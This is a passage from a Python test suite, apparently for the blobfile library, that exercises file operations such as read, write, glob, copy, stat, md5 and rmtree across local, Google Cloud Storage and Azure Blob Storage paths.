"ctx", [_get_temp_local_path, _get_temp_gcs_path, _get_temp_as_path]
)
def test_get_url(ctx):
contents = b"meow!"
with ctx() as path:
_write_contents(path, contents)
url, _ = bf.get_url(path)
assert urllib.request.urlopen(url).read() == contents
def test_azure_public_get_url():
contents = urllib.request.urlopen(AZURE_PUBLIC_URL).read()
assert contents.startswith(AZURE_PUBLIC_URL_HEADER)
url, _ = bf.get_url(AZURE_PUBLIC_URL)
assert urllib.request.urlopen(url).read() == contents
@pytest.mark.parametrize(
"ctx", [_get_temp_local_path, _get_temp_gcs_path, _get_temp_as_path]
)
@pytest.mark.parametrize("streaming", [True, False])
def test_read_write(ctx, streaming):
contents = b"meow!\npurr\n"
with ctx() as path:
path = bf.join(path, "a folder", "a.file")
bf.makedirs(bf.dirname(path))
with bf.BlobFile(path, "wb", streaming=streaming) as w:
w.write(contents)
assert w.tell() == len(contents)
with bf.BlobFile(path, "rb", streaming=streaming) as r:
assert r.read() == contents
assert r.tell() == len(contents)
with bf.BlobFile(path, "rb", streaming=streaming) as r:
lines = list(r)
assert b"".join(lines) == contents
@pytest.mark.parametrize("ctx", [_get_temp_gcs_path, _get_temp_as_path])
def test_zipfile(ctx):
contents = b"meow!\npurr\n"
with ctx() as path:
with bf.BlobFile(path, "wb", streaming=True) as f:
with zipfile.ZipFile(f, "w") as zf:
with zf.open("eggs.txt", "w") as myfile:
myfile.write(contents)
with bf.BlobFile(path, "rb", streaming=True) as f:
with zipfile.ZipFile(f, "r") as zf:
with zf.open("eggs.txt", "r") as myfile:
assert myfile.read() == contents
def test_az_path():
contents = b"meow!\npurr\n"
with _get_temp_as_path() as path:
path = _convert_https_to_az(path)
path = bf.join(path, "a folder", "a.file")
path = _convert_https_to_az(path)
bf.makedirs(_convert_https_to_az(bf.dirname(path)))
with bf.BlobFile(path, "wb") as w:
w.write(contents)
with bf.BlobFile(path, "rb") as r:
assert r.read() == contents
with bf.BlobFile(path, "rb") as r:
lines = list(r)
assert b"".join(lines) == contents
@pytest.mark.parametrize(
"ctx", [_get_temp_local_path, _get_temp_gcs_path, _get_temp_as_path]
)
def test_append(ctx):
contents = b"meow!\n"
additional_contents = b"purr\n"
with ctx() as path:
with bf.BlobFile(path, "ab", streaming=False) as w:
w.write(contents)
with bf.BlobFile(path, "ab", streaming=False) as w:
w.write(additional_contents)
with bf.BlobFile(path, "rb") as r:
assert r.read() == contents + additional_contents
@pytest.mark.parametrize(
"ctx", [_get_temp_local_path, _get_temp_gcs_path, _get_temp_as_path]
)
def test_stat(ctx):
contents = b"meow!"
with ctx() as path:
_write_contents(path, contents)
s = bf.stat(path)
assert s.size == len(contents)
assert abs(time.time() - s.mtime) <= 20
@pytest.mark.parametrize(
"ctx", [_get_temp_local_path, _get_temp_gcs_path, _get_temp_as_path]
)
def test_set_mtime(ctx):
contents = b"meow!"
with ctx() as path:
_write_contents(path, contents)
s = bf.stat(path)
assert abs(time.time() - s.mtime) <= 20
new_mtime = 1
assert bf.set_mtime(path, new_mtime)
assert bf.stat(path).mtime == new_mtime
@pytest.mark.parametrize("ctx", [_get_temp_as_path])
def test_azure_metadata(ctx):
# make sure metadata is preserved when opening a file for writing
# which clears uncommitted blocks
contents = b"meow!"
with ctx() as path:
with bf.BlobFile(path, "wb") as f:
f.write(contents)
bf.set_mtime(path, 1)
time.sleep(5)
with bf.BlobFile(path, "wb", streaming=True) as f:
st = bf.stat(path)
assert st.mtime == 1
@pytest.mark.parametrize(
"ctx", [_get_temp_local_path, _get_temp_gcs_path, _get_temp_as_path]
)
def test_remove(ctx):
contents = b"meow!"
with ctx() as path:
_write_contents(path, contents)
assert bf.exists(path)
bf.remove(path)
assert not bf.exists(path)
@pytest.mark.parametrize(
# don't test local path because that has slightly different behavior
"ctx",
[_get_temp_gcs_path, _get_temp_as_path],
)
def test_rmdir(ctx):
contents = b"meow!"
with ctx() as path:
dirpath = bf.dirname(path)
# this is an error for a local path but not for a blob path
bf.rmdir(bf.join(dirpath, "fakedirname"))
new_dirpath = bf.join(dirpath, "dirname")
bf.makedirs(new_dirpath)
assert bf.exists(new_dirpath)
bf.rmdir(new_dirpath)
assert not bf.exists(new_dirpath)
# double delete is fine
bf.rmdir(new_dirpath)
# implicit dir
new_filepath = bf.join(dirpath, "dirname", "name")
_write_contents(new_filepath, contents)
with pytest.raises(OSError):
# not empty dir
bf.rmdir(new_dirpath)
bf.remove(new_filepath)
bf.rmdir(new_dirpath)
@pytest.mark.parametrize(
"ctx", [_get_temp_local_path, _get_temp_gcs_path, _get_temp_as_path]
)
def test_makedirs(ctx):
contents = b"meow!"
with ctx() as path:
dirpath = bf.join(path, "x", "x", "x")
bf.makedirs(dirpath)
assert bf.exists(dirpath)
_write_contents(bf.join(dirpath, "testfile"), contents)
@pytest.mark.parametrize(
"ctx", [_get_temp_local_path, _get_temp_gcs_path, _get_temp_as_path]
)
def test_isdir(ctx):
contents = b"meow!"
with ctx() as path:
assert not bf.isdir(path)
_write_contents(path, contents)
assert not bf.isdir(path)
dirpath = path + ".dir"
bf.makedirs(dirpath)
assert bf.isdir(dirpath)
assert not bf.isdir(dirpath[:-1])
filepath = bf.join(path + ".otherdir", "subdir", "file.name")
if "://" not in path:
# implicit directory
bf.makedirs(bf.dirname(filepath))
dirpath = bf.dirname(bf.dirname(filepath))
_write_contents(filepath, contents)
assert bf.isdir(dirpath)
assert not bf.isdir(dirpath[:-1])
@pytest.mark.parametrize(
"ctx", [_get_temp_local_path, _get_temp_gcs_path, _get_temp_as_path]
)
def test_listdir(ctx):
contents = b"meow!"
with ctx() as path:
dirpath = bf.dirname(path)
bf.makedirs(dirpath)
a_path = bf.join(dirpath, "a")
with bf.BlobFile(a_path, "wb") as w:
w.write(contents)
b_path = bf.join(dirpath, "b")
with bf.BlobFile(b_path, "wb") as w:
w.write(contents)
bf.makedirs(bf.join(dirpath, "c"))
expected = ["a", "b", "c"]
assert sorted(list(bf.listdir(dirpath))) == expected
dirpath = _convert_https_to_az(dirpath)
assert sorted(list(bf.listdir(dirpath))) == expected
@pytest.mark.parametrize(
"ctx", [_get_temp_local_path, _get_temp_gcs_path, _get_temp_as_path]
)
def test_scandir(ctx):
contents = b"meow!"
with ctx() as path:
dirpath = bf.dirname(path)
a_path = bf.join(dirpath, "a")
with bf.BlobFile(a_path, "wb") as w:
w.write(contents)
b_path = bf.join(dirpath, "b")
with bf.BlobFile(b_path, "wb") as w:
w.write(contents)
bf.makedirs(bf.join(dirpath, "c"))
entries = sorted(list(bf.scandir(dirpath)))
assert [e.name for e in entries] == ["a", "b", "c"]
assert [e.path for e in entries] == [
bf.join(dirpath, name) for name in ["a", "b", "c"]
]
assert [e.is_dir for e in entries] == [False, False, True]
assert [e.is_file for e in entries] == [True, True, False]
assert entries[0].stat.size == len(contents)
assert entries[1].stat.size == len(contents)
assert entries[2].stat is None
@pytest.mark.parametrize(
"ctx", [_get_temp_local_path, _get_temp_gcs_path, _get_temp_as_path]
)
def test_listdir_sharded(ctx):
contents = b"meow!"
with ctx() as path:
dirpath = bf.dirname(path)
with bf.BlobFile(bf.join(dirpath, "a"), "wb") as w:
w.write(contents)
with bf.BlobFile(bf.join(dirpath, "aa"), "wb") as w:
w.write(contents)
with bf.BlobFile(bf.join(dirpath, "b"), "wb") as w:
w.write(contents)
with bf.BlobFile(bf.join(dirpath, "ca"), "wb") as w:
w.write(contents)
bf.makedirs(bf.join(dirpath, "c"))
with bf.BlobFile(bf.join(dirpath, "c/a"), "wb") as w:
w.write(contents)
# this should also test shard_prefix_length=2 but that takes too long
assert sorted(list(bf.listdir(dirpath, shard_prefix_length=1))) == [
"a",
"aa",
"b",
"c",
"ca",
]
@pytest.mark.parametrize(
"ctx", [_get_temp_local_path, _get_temp_gcs_path, _get_temp_as_path]
)
@pytest.mark.parametrize("topdown", [False, True])
def test_walk(ctx, topdown):
contents = b"meow!"
with ctx() as path:
dirpath = bf.dirname(path)
a_path = bf.join(dirpath, "a")
with bf.BlobFile(a_path, "wb") as w:
w.write(contents)
bf.makedirs(bf.join(dirpath, "c/d"))
b_path = bf.join(dirpath, "c/d/b")
with bf.BlobFile(b_path, "wb") as w:
w.write(contents)
expected = [
(dirpath, ["c"], ["a"]),
(bf.join(dirpath, "c"), ["d"], []),
(bf.join(dirpath, "c", "d"), [], ["b"]),
]
if not topdown:
expected = list(reversed(expected))
assert list(bf.walk(dirpath, topdown=topdown)) == expected
dirpath = _convert_https_to_az(dirpath)
assert list(bf.walk(dirpath, topdown=topdown)) == expected
@pytest.mark.parametrize(
"ctx", [_get_temp_local_path, _get_temp_gcs_path, _get_temp_as_path]
)
@pytest.mark.parametrize("parallel", [False, True])
def test_glob(ctx, parallel):
contents = b"meow!"
with ctx() as path:
dirpath = bf.dirname(path)
a_path = bf.join(dirpath, "ab")
with bf.BlobFile(a_path, "wb") as w:
w.write(contents)
b_path = bf.join(dirpath, "bb")
with bf.BlobFile(b_path, "wb") as w:
w.write(contents)
def assert_listing_equal(path, desired):
desired = sorted([bf.join(dirpath, p) for p in desired])
actual = sorted(list(bf.glob(path, parallel=parallel)))
assert actual == desired, f"{actual} != {desired}"
assert_listing_equal(bf.join(dirpath, "*b"), ["ab", "bb"])
assert_listing_equal(bf.join(dirpath, "a*"), ["ab"])
assert_listing_equal(bf.join(dirpath, "ab*"), ["ab"])
assert_listing_equal(bf.join(dirpath, "*"), ["ab", "bb"])
assert_listing_equal(bf.join(dirpath, "bb"), ["bb"])
path = bf.join(dirpath, "test.txt")
with bf.BlobFile(path, "wb") as w:
w.write(contents)
path = bf.join(dirpath, "subdir", "test.txt")
bf.makedirs(bf.dirname(path))
with bf.BlobFile(path, "wb") as f:
f.write(contents)
path = bf.join(dirpath, "subdir", "subsubdir", "test.txt")
if "://" not in path:
# implicit directory
bf.makedirs(bf.dirname(path))
with bf.BlobFile(path, "wb") as f:
f.write(contents)
assert_listing_equal(bf.join(dirpath, "*/test.txt"), ["subdir/test.txt"])
assert_listing_equal(bf.join(dirpath, "*/*.txt"), ["subdir/test.txt"])
if "://" in path:
# local glob doesn't handle ** the same way as remote glob
assert_listing_equal(
bf.join(dirpath, "**.txt"),
["test.txt", "subdir/test.txt", "subdir/subsubdir/test.txt"],
)
else:
assert_listing_equal(bf.join(dirpath, "**.txt"), ["test.txt"])
assert_listing_equal(bf.join(dirpath, "*/test"), [])
assert_listing_equal(bf.join(dirpath, "subdir/test.txt"), ["subdir/test.txt"])
# directories
assert_listing_equal(bf.join(dirpath, "*"), ["ab", "bb", "subdir", "test.txt"])
assert_listing_equal(bf.join(dirpath, "subdir"), ["subdir"])
assert_listing_equal(bf.join(dirpath, "subdir/"), ["subdir"])
assert_listing_equal(bf.join(dirpath, "*/"), ["subdir"])
assert_listing_equal(bf.join(dirpath, "*dir"), ["subdir"])
assert_listing_equal(bf.join(dirpath, "subdir/*dir"), ["subdir/subsubdir"])
assert_listing_equal(bf.join(dirpath, "subdir/*dir/"), ["subdir/subsubdir"])
assert_listing_equal(bf.join(dirpath, "su*ir/*dir/"), ["subdir/subsubdir"])
@pytest.mark.parametrize(
"ctx", [_get_temp_local_path, _get_temp_gcs_path, _get_temp_as_path]
)
def test_scanglob(ctx):
contents = b"meow!"
with ctx() as path:
dirpath = bf.dirname(path)
a_path = bf.join(dirpath, "ab")
with bf.BlobFile(a_path, "wb") as w:
w.write(contents)
b_path = bf.join(dirpath, "bb")
with bf.BlobFile(b_path, "wb") as w:
w.write(contents)
path = bf.join(dirpath, "test.txt")
with bf.BlobFile(path, "wb") as w:
w.write(contents)
path = bf.join(dirpath, "subdir", "test.txt")
bf.makedirs(bf.dirname(path))
with bf.BlobFile(path, "wb") as f:
f.write(contents)
entries = sorted(list(bf.scanglob(bf.join(dirpath, "*b*"))))
assert entries[0].name == "ab" and entries[0].is_file
assert entries[1].name == "bb" and entries[1].is_file
assert entries[2].name == "subdir" and entries[2].is_dir
@pytest.mark.parametrize(
"ctx", [_get_temp_local_path, _get_temp_gcs_path, _get_temp_as_path]
)
def test_rmtree(ctx):
contents = b"meow!"
with ctx() as path:
root = bf.dirname(path)
destroy_path = bf.join(root, "destroy")
bf.makedirs(destroy_path)
save_path = bf.join(root, "save")
bf.makedirs(save_path)
# implicit dir
        if "://" not in path:
bf.makedirs(bf.join(destroy_path, "adir"))
with bf.BlobFile(bf.join(destroy_path, "adir/b"), "wb") as w:
w.write(contents)
# explicit dir
bf.makedirs(bf.join(destroy_path, "bdir"))
with bf.BlobFile(bf.join(destroy_path, "bdir/b"), "wb") as w:
w.write(contents)
bf.makedirs(bf.join(save_path, "somedir"))
with bf.BlobFile(bf.join(save_path, "somefile"), "wb") as w:
w.write(contents)
def assert_listing_equal(path, desired):
actual = list(bf.walk(path))
# ordering of os walk is weird, only compare sorted order
assert sorted(actual) == sorted(desired), f"{actual} != {desired}"
assert_listing_equal(
root,
[
(root, ["destroy", "save"], []),
(destroy_path, ["adir", "bdir"], []),
(bf.join(destroy_path, "adir"), [], ["b"]),
(bf.join(destroy_path, "bdir"), [], ["b"]),
(save_path, ["somedir"], ["somefile"]),
(bf.join(save_path, "somedir"), [], []),
],
)
bf.rmtree(destroy_path)
assert_listing_equal(
root,
[
(root, ["save"], []),
(save_path, ["somedir"], ["somefile"]),
(bf.join(save_path, "somedir"), [], []),
],
)
@pytest.mark.parametrize("parallel", [False, True])
def test_copy(parallel):
contents = b"meow!"
with _get_temp_local_path() as local_path1, _get_temp_local_path() as local_path2, _get_temp_local_path() as local_path3, _get_temp_gcs_path() as gcs_path1, _get_temp_gcs_path() as gcs_path2, _get_temp_as_path() as as_path1, _get_temp_as_path() as as_path2, _get_temp_as_path(
account=AS_TEST_ACCOUNT2, container=AS_TEST_CONTAINER2
) as as_path3, _get_temp_as_path() as as_path4:
with pytest.raises(FileNotFoundError):
bf.copy(gcs_path1, gcs_path2, parallel=parallel)
with pytest.raises(FileNotFoundError):
bf.copy(as_path1, as_path2, parallel=parallel)
_write_contents(local_path1, contents)
testcases = [
(local_path1, local_path2),
(local_path1, gcs_path1),
(gcs_path1, gcs_path2),
(gcs_path2, as_path1),
(as_path1, as_path2),
(as_path2, as_path3),
(as_path3, local_path3),
(local_path3, as_path4),
]
for src, dst in testcases:
h = bf.copy(src, dst, return_md5=True, parallel=parallel)
assert h == hashlib.md5(contents).hexdigest()
assert _read_contents(dst) == contents
with pytest.raises(FileExistsError):
bf.copy(src, dst, parallel=parallel)
bf.copy(src, dst, overwrite=True, parallel=parallel)
assert _read_contents(dst) == contents
# the tests already take awhile and this adds like a minute
@pytest.mark.slow
@pytest.mark.parametrize("ctx", [_get_temp_gcs_path, _get_temp_as_path])
def test_parallel_copy_large_file(ctx):
contents = b"meow!" * common.PARALLEL_COPY_MINIMUM_PART_SIZE + b"meow???"
with ctx() as remote_path:
with tempfile.TemporaryDirectory() as tmpdir:
local_path = os.path.join(tmpdir, "test.txt")
with open(local_path, "wb") as f:
f.write(contents)
bf.copy(local_path, remote_path, parallel=True)
assert _read_contents(remote_path) == contents
with tempfile.TemporaryDirectory() as tmpdir:
local_path = os.path.join(tmpdir, "test.txt")
bf.copy(remote_path, local_path, parallel=True)
assert _read_contents(local_path) == contents
def test_copy_azure_public():
with _get_temp_as_path() as dst:
bf.copy(AZURE_PUBLIC_URL, dst)
assert _read_contents(dst)[:4] == AZURE_PUBLIC_URL_HEADER
@pytest.mark.parametrize(
"ctx", [_get_temp_local_path, _get_temp_gcs_path, _get_temp_as_path]
)
def test_exists(ctx):
contents = b"meow!"
with ctx() as path:
assert not bf.exists(path)
_write_contents(path, contents)
assert bf.exists(path)
def test_concurrent_write_gcs():
with _get_temp_gcs_path() as path:
outer_contents = b"miso" * (2 ** 20 + 1)
inner_contents = b"momo" * (2 ** 20 + 1)
with bf.BlobFile(path, "wb", streaming=True) as f:
f.write(outer_contents)
with bf.BlobFile(path, "wb", streaming=True) as f:
f.write(inner_contents)
# the outer write will finish last and overwrite the inner one
# the last writer to finish wins with this setup
with bf.BlobFile(path, "rb") as f:
assert f.read() == outer_contents
def test_concurrent_write_as():
with _get_temp_as_path() as path:
bf.configure(azure_write_chunk_size=2 ** 20)
outer_contents = b"miso" * (2 ** 20 + 1)
inner_contents = b"momo" * (2 ** 20 + 1)
# the inner write will invalidate the outer one, the last writer
# to start wins with this setup
with pytest.raises(bf.ConcurrentWriteFailure):
with bf.BlobFile(path, "wb", streaming=True) as f:
f.write(outer_contents)
with bf.BlobFile(path, "wb", streaming=True) as f:
f.write(inner_contents)
# the outer write will finish last and overwrite the inner one
with bf.BlobFile(path, "rb") as f:
assert f.read() == inner_contents
bf.configure()
@contextlib.contextmanager
def environ_context():
env = os.environ.copy()
yield
os.environ = env
def test_more_exists():
testcases = [
(AZURE_INVALID_CONTAINER, False),
(AZURE_INVALID_CONTAINER + "/", False),
(AZURE_INVALID_CONTAINER + "//", False),
(AZURE_INVALID_CONTAINER + "/invalid.file", False),
(GCS_INVALID_BUCKET, False),
(GCS_INVALID_BUCKET + "/", False),
(GCS_INVALID_BUCKET + "//", False),
(GCS_INVALID_BUCKET + "/invalid.file", False),
(AZURE_INVALID_CONTAINER_NO_ACCOUNT, False),
(AZURE_INVALID_CONTAINER_NO_ACCOUNT + "/", False),
(AZURE_INVALID_CONTAINER_NO_ACCOUNT + "//", False),
(AZURE_INVALID_CONTAINER_NO_ACCOUNT + "/invalid.file", False),
(AZURE_VALID_CONTAINER, True),
(AZURE_VALID_CONTAINER + "/", True),
(AZURE_VALID_CONTAINER + "//", False),
(AZURE_VALID_CONTAINER + "/invalid.file", False),
(GCS_VALID_BUCKET, True),
(GCS_VALID_BUCKET + "/", True),
(GCS_VALID_BUCKET + "//", False),
(GCS_VALID_BUCKET + "/invalid.file", False),
(f"/does-not-exist", False),
(f"/", True),
]
for path, should_exist in testcases:
assert bf.exists(path) == should_exist
@pytest.mark.parametrize(
"base_path",
[AZURE_INVALID_CONTAINER_NO_ACCOUNT, AZURE_INVALID_CONTAINER, GCS_INVALID_BUCKET],
)
def test_invalid_paths(base_path):
for suffix in ["", "/", "//", "/invalid.file", "/invalid/dir/"]:
path = base_path + suffix
print(path)
if path.endswith("/"):
expected_error = IsADirectoryError
else:
expected_error = FileNotFoundError
list(bf.glob(path))
if suffix == "":
for pattern in ["*", "**"]:
try:
list(bf.glob(path + pattern))
except bf.Error as e:
assert "Wildcards cannot be used" in e.message
else:
for pattern in ["*", "**"]:
list(bf.glob(path + pattern))
with pytest.raises(FileNotFoundError):
list(bf.listdir(path))
assert not bf.exists(path)
assert not bf.isdir(path)
with pytest.raises(expected_error):
bf.remove(path)
if suffix in ("", "/"):
try:
bf.rmdir(path)
except bf.Error as e:
assert "Cannot delete bucket" in e.message
else:
bf.rmdir(path)
with pytest.raises(NotADirectoryError):
bf.rmtree(path)
with pytest.raises(FileNotFoundError):
bf.stat(path)
if base_path == AZURE_INVALID_CONTAINER_NO_ACCOUNT:
with pytest.raises(bf.Error):
bf.get_url(path)
else:
bf.get_url(path)
with pytest.raises(FileNotFoundError):
bf.md5(path)
with pytest.raises(bf.Error):
bf.makedirs(path)
list(bf.walk(path))
with tempfile.TemporaryDirectory() as tmpdir:
local_path = os.path.join(tmpdir, "test.txt")
with pytest.raises(expected_error):
bf.copy(path, local_path)
with open(local_path, "w") as f:
f.write("meow")
with pytest.raises(expected_error):
bf.copy(local_path, path)
for streaming in [False, True]:
with pytest.raises(expected_error):
with bf.BlobFile(path, "rb", streaming=streaming) as f:
f.read()
with pytest.raises(expected_error):
with bf.BlobFile(path, "wb", streaming=streaming) as f:
f.write(b"meow")
@pytest.mark.parametrize("buffer_size", [1, 100])
@pytest.mark.parametrize("ctx", [_get_temp_gcs_path, _get_temp_as_path])
def test_read_stats(buffer_size, ctx):
with ctx() as path:
contents = b"meow!"
with bf.BlobFile(path, "wb") as w:
w.write(contents)
with bf.BlobFile(path, "rb", buffer_size=buffer_size) as r:
r.read(1)
if buffer_size == 1:
assert r.raw.bytes_read == 1 # type: ignore
else:
assert r.raw.bytes_read == len(contents) # type: ignore
with bf.BlobFile(path, "rb", buffer_size=buffer_size) as r:
r.read(1)
r.seek(4)
r.read(1)
r.seek(1000000)
assert r.read(1) == b""
if buffer_size == 1:
assert r.raw.requests == 2 # type: ignore
assert r.raw.bytes_read == 2 # type: ignore
else:
assert r.raw.requests == 1 # type: ignore
assert r.raw.bytes_read == len(contents) # type: ignore
@pytest.mark.parametrize("ctx", [_get_temp_gcs_path, _get_temp_as_path])
def test_cache_dir(ctx):
cache_dir = tempfile.mkdtemp()
contents = b"meow!"
alternative_contents = b"purr!"
with ctx() as path:
with bf.BlobFile(path, mode="wb") as f:
f.write(contents)
with bf.BlobFile(path, mode="rb", streaming=False, cache_dir=cache_dir) as f:
assert f.read() == contents
content_hash = hashlib.md5(contents).hexdigest()
cache_path = bf.join(cache_dir, content_hash, bf.basename(path))
with open(cache_path, "rb") as f:
assert f.read() == contents
# alter the cached file to make sure we are not re-reading the remote file
with open(cache_path, "wb") as f:
f.write(alternative_contents)
with bf.BlobFile(path, mode="rb", streaming=False, cache_dir=cache_dir) as f:
assert f.read() == alternative_contents
@pytest.mark.parametrize(
"ctx", [_get_temp_local_path, _get_temp_gcs_path, _get_temp_as_path]
)
@pytest.mark.parametrize("use_random", [False, True])
def test_change_file_size(ctx, use_random):
chunk_size = 8 * 2 ** 20
long_contents = b"\x00" * chunk_size * 3
short_contents = b"\xFF" * chunk_size * 2
if use_random:
long_contents = os.urandom(len(long_contents))
short_contents = os.urandom(len(short_contents))
with ctx() as path:
# make file shorter
with bf.BlobFile(path, "wb") as f:
f.write(long_contents)
with bf.BlobFile(path, "rb") as f:
read_contents = f.read(chunk_size)
with bf.BlobFile(path, "wb") as f2:
f2.write(short_contents)
# close underlying connection
f.raw._f = None # type: ignore
read_contents += f.read()
assert len(f.read()) == 0
assert (
read_contents
== long_contents[:chunk_size] + short_contents[chunk_size:]
)
# make file longer
with bf.BlobFile(path, "wb") as f:
f.write(short_contents)
with bf.BlobFile(path, "rb") as f:
read_contents = f.read(chunk_size)
with bf.BlobFile(path, "wb") as f2:
f2.write(long_contents)
# close underlying connection
f.raw._f = None # type: ignore
read_contents += f.read()
assert len(f.read()) == 0
expected = (
short_contents[:chunk_size] + long_contents[chunk_size : chunk_size * 2]
)
# local files behave differently and read the new contents until the
# end of the new file size
if not path.startswith("gs://") and not path.startswith("https://"):
expected = short_contents[:chunk_size] + long_contents[chunk_size:]
assert read_contents == expected
@pytest.mark.parametrize(
"ctx", [_get_temp_local_path, _get_temp_gcs_path, _get_temp_as_path]
)
def test_overwrite_while_reading(ctx):
chunk_size = 8 * 2 ** 20
contents = b"\x00" * chunk_size * 2
alternative_contents = b"\xFF" * chunk_size * 4
with ctx() as path:
with bf.BlobFile(path, "wb") as f:
f.write(contents)
with bf.BlobFile(path, "rb") as f:
read_contents = f.read(chunk_size)
with bf.BlobFile(path, "wb") as f2:
f2.write(alternative_contents)
# close underlying connection
f.raw._f = None # type: ignore
read_contents += f.read(chunk_size)
assert (
read_contents
== contents[:chunk_size]
+ alternative_contents[chunk_size : chunk_size * 2]
)
def test_create_local_intermediate_dirs():
contents = b"meow"
with _get_temp_local_path() as path:
dirpath = bf.dirname(path)
with chdir(dirpath):
for filepath in [
bf.join(dirpath, "dirname", "file.name"),
bf.join("..", bf.basename(dirpath), "file.name"),
"./file.name",
"file.name",
]:
with bf.BlobFile(filepath, "wb") as f:
f.write(contents)
@pytest.mark.parametrize("binary", [True, False])
@pytest.mark.parametrize("streaming", [True, False])
@pytest.mark.parametrize(
"ctx", [_get_temp_local_path, _get_temp_gcs_path, _get_temp_as_path]
)
def test_more_read_write(binary, streaming, ctx):
rng = np.random.RandomState(0)
with ctx() as path:
if binary:
read_mode = "rb"
write_mode = "wb"
else:
read_mode = "r"
write_mode = "w"
with bf.BlobFile(path, write_mode, streaming=streaming) as w:
pass
with bf.BlobFile(path, read_mode, streaming=streaming) as r:
assert len(r.read()) == 0
contents = b"meow!"
if not binary:
contents = contents.decode("utf8")
with bf.BlobFile(path, write_mode, streaming=streaming) as w:
w.write(contents)
with bf.BlobFile(path, read_mode, streaming=streaming) as r:
assert r.read(1) == contents[:1]
assert r.read() == contents[1:]
assert len(r.read()) == 0
with bf.BlobFile(path, read_mode, streaming=streaming) as r:
for i in range(len(contents)):
assert r.read(1) == contents[i : i + 1]
assert len(r.read()) == 0
assert len(r.read()) == 0
contents = b"meow!\n\nmew!\n"
lines = [b"meow!\n", b"\n", b"mew!\n"]
if not binary:
contents = contents.decode("utf8")
lines = [line.decode("utf8") for line in lines]
with bf.BlobFile(path, write_mode, streaming=streaming) as w:
w.write(contents)
with bf.BlobFile(path, read_mode, streaming=streaming) as r:
assert r.readlines() == lines
with bf.BlobFile(path, read_mode, streaming=streaming) as r:
assert [line for line in r] == lines
if binary:
for size in [2 * 2 ** 20, 12_345_678]:
contents = rng.randint(0, 256, size=size, dtype=np.uint8).tobytes()
with bf.BlobFile(path, write_mode, streaming=streaming) as w:
w.write(contents)
with bf.BlobFile(path, read_mode, streaming=streaming) as r:
size = rng.randint(0, 1_000_000)
buf = b""
while True:
b = r.read(size)
if b == b"":
break
buf += b
assert buf == contents
else:
obj = {"a": 1}
with bf.BlobFile(path, write_mode, streaming=streaming) as w:
json.dump(obj, w)
with bf.BlobFile(path, read_mode, streaming=streaming) as r:
assert json.load(r) == obj
@pytest.mark.parametrize("streaming", [True, False])
@pytest.mark.parametrize(
"ctx", [_get_temp_local_path, _get_temp_gcs_path, _get_temp_as_path]
)
def test_video(streaming, ctx):
rng = np.random.RandomState(0)
shape = (256, 64, 64, 3)
video_data = rng.randint(0, 256, size=np.prod(shape), dtype=np.uint8).reshape(shape)
with ctx() as path:
with bf.BlobFile(path, mode="wb", streaming=streaming) as wf:
with imageio.get_writer(
wf,
format="ffmpeg",
quality=None,
codec="libx264rgb",
pixelformat="bgr24",
output_params=["-f", "mp4", "-crf", "0"],
) as w:
for frame in video_data:
w.append_data(frame)
with bf.BlobFile(path, mode="rb", streaming=streaming) as rf:
with imageio.get_reader(
rf, format="ffmpeg", input_params=["-f", "mp4"]
) as r:
for idx, frame in enumerate(r):
assert np.array_equal(frame, video_data[idx])
with bf.BlobFile(path, mode="rb", streaming=streaming) as rf:
container = av.open(rf)
stream = container.streams.video[0]
for idx, frame in enumerate(container.decode(stream)):
assert np.array_equal(frame.to_image(), video_data[idx])
# this is pretty slow and docker will often run out of memory
@pytest.mark.slow
@pytest.mark.parametrize(
"ctx", [_get_temp_local_path, _get_temp_gcs_path, _get_temp_as_path]
)
def test_large_file(ctx):
contents = b"0" * 2 ** 32
with ctx() as path:
with bf.BlobFile(path, "wb", streaming=True) as f:
f.write(contents)
with bf.BlobFile(path, "rb", streaming=True) as f:
assert contents == f.read()
def test_composite_objects():
with _get_temp_gcs_path() as remote_path:
with _get_temp_local_path() as local_path:
contents = b"0" * 2 * 2 ** 20
with open(local_path, "wb") as f:
f.write(contents)
def create_composite_file():
sp.run(
[
"gsutil",
"-o",
"GSUtil:parallel_composite_upload_threshold=1M",
"cp",
local_path,
remote_path,
],
check=True,
)
local_md5 = hashlib.md5(contents).hexdigest()
create_composite_file()
assert bf.stat(remote_path).md5 is None
assert local_md5 == bf.md5(remote_path)
assert bf.stat(remote_path).md5 == local_md5
assert local_md5 == bf.md5(remote_path)
bf.remove(remote_path)
create_composite_file()
assert bf.stat(remote_path).md5 is None
with tempfile.TemporaryDirectory() as tmpdir:
with bf.BlobFile(
remote_path, "rb", cache_dir=tmpdir, streaming=False
) as f:
assert f.read() == contents
assert bf.stat(remote_path).md5 == local_md5
@pytest.mark.parametrize(
"ctx", [_get_temp_local_path, _get_temp_gcs_path, _get_temp_as_path]
)
def test_md5(ctx):
contents = b"meow!"
meow_hash = hashlib.md5(contents).hexdigest()
with ctx() as path:
_write_contents(path, contents)
assert bf.md5(path) == meow_hash
with bf.BlobFile(path, "wb") as f:
f.write(contents)
assert bf.md5(path) == meow_hash
with bf.BlobFile(path, "wb") as f:
f.write(contents)
assert bf.md5(path) == meow_hash
@pytest.mark.parametrize("ctx", [_get_temp_as_path])
def test_azure_maybe_update_md5(ctx):
contents = b"meow!"
meow_hash = hashlib.md5(contents).hexdigest()
alternative_contents = b"purr"
purr_hash = hashlib.md5(alternative_contents).hexdigest()
with ctx() as path:
_write_contents(path, contents)
st = azure.maybe_stat(ops.default_context._conf, path)
assert azure.maybe_update_md5(
ops.default_context._conf, path, st.version, meow_hash
)
_write_contents(path, alternative_contents)
assert not azure.maybe_update_md5(
ops.default_context._conf, path, st.version, meow_hash
)
st = azure.maybe_stat(ops.default_context._conf, path)
assert st.md5 == purr_hash
bf.remove(path)
assert not azure.maybe_update_md5(
ops.default_context._conf, path, st.version, meow_hash
)
def _get_http_pool_id(q):
q.put(id(ops.default_context._conf.get_http_pool()))
def test_fork():
q = mp.Queue()
# this reference should keep the old http client alive in the child process
# to ensure that a new one does not recycle the memory address
http1 = ops.default_context._conf.get_http_pool()
parent1 = id(http1)
p = mp.Process(target=_get_http_pool_id, args=(q,))
p.start()
p.join()
http2 = ops.default_context._conf.get_http_pool()
parent2 = id(http2)
child = q.get()
assert parent1 == parent2
assert child != parent1
def test_azure_public_container():
for error, path in [
(
None,
f"https://{AS_EXTERNAL_ACCOUNT}.blob.core.windows.net/publiccontainer/test_cat.png",
),
(
bf.Error,
f"https://{AS_EXTERNAL_ACCOUNT}.blob.core.windows.net/private/test_cat.png",
), # an account that exists but with a non-public container
(
FileNotFoundError,
f"https://{AS_INVALID_ACCOUNT}.blob.core.windows.net/publiccontainer/test_cat.png",
), # account that does not exist
]:
ctx = contextlib.nullcontext()
if error is not None:
ctx = pytest.raises(error)
